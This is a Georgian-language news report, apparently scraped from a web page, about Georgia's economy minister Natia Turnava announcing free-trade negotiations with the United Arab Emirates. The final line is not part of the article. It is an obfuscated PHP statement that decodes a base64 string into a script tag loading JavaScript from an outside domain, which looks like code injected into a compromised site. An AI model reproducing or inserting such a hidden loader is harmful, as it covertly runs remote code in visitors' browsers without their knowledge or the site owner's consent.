celsiusi
ავერსი საქკაბელი
„საქართველო არაბთა საამიროებთან თავისუფალი ვაჭრობის შეთანხმებაზე მოლაპარაკებას დაიწყებს“, - ამის შესახებ საქართველოს ეკონომიკისა და მდგრადი განვითარების მინისტრმა ნათია თურნავამ არაბთა გაერთიანებული საამიროების ეკონომიკის სამინისტროში შეხვედრის შემდეგ განაცხადა. ინფორმაციას ეკონომიკის სამინისტრო ავრცელებს.
 
მისი თქმით, არაბთა გაერთიანებულ საამიროებთან თავისუფალი ვაჭრობის ხელშეკრულებაზე მოლაპარაკებების დაწყების ნაწილში საქართველო რეგიონში ერთ-ერთი პირველი ქვეყანა იქნება.
 
„მნიშვნელოვანია, რომ მოლაპარაკება დაიწყება სპეციალური კვლევის გარეშე, რადგან ქვეყნებს შორის არსებული სავაჭრო - ეკონომიკური ტენდენციების გათვალისწინებით, ცხადია, რომ თავისუფალი ვაჭრობა ორივე მხარეს დიდ სარგებელს მოუტანს“, - განმარტა თურნავამ.
 
შეხვედრაზე აღინიშნა, რომ საქართველოსა და არაბთა გაერთიანებულ საამიროებს შორის სავაჭრო დინამიკა მზარდია.
 
„შეხვედრა გვქონდა საამიროების მსხვილ სავაჭრო ქსელთან, რომელიც საქართველოდან პროდუქტის იმპორტს ახორციელებს, შესაბამისად, საქართველოს მწარმოებლებთან თანამშრომლობის დადებითი გამოცდილება აქვს და რაც მთავარია, მის სავაჭრო ქსელში საქართველოში წარმოებული პროდუქტის, განსაკუთრებით, აგროსამრეწველო ნაწარმის მოცულობა ყოველწლიურად იზრდება. ვფიქრობ, არაბთა გაერთიანებულ საამიროებთან თავისუფალი ვაჭრობის შეთანხმების ამოქმედება შესაძლებელს გახდის, რომ მეტი ქართული პროდუქცია იყოს წარმოდგენილი საამიროების ბაზარზე,“ - განაცხადა ნათია თურნავამ.
 
აღსანიშნავია, რომ არაბეთის გაერთიანებული საამიროების მხრიდან საქართველო იქნება რეგიონში პირველი ქვეყანა, რომელიც არაბთა გაერთიანებულ საამიროებთან თავისუფალი ვაჭრობის შეთანხმებაზე მოლაპარაკებას დაიწყებს.
1085
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");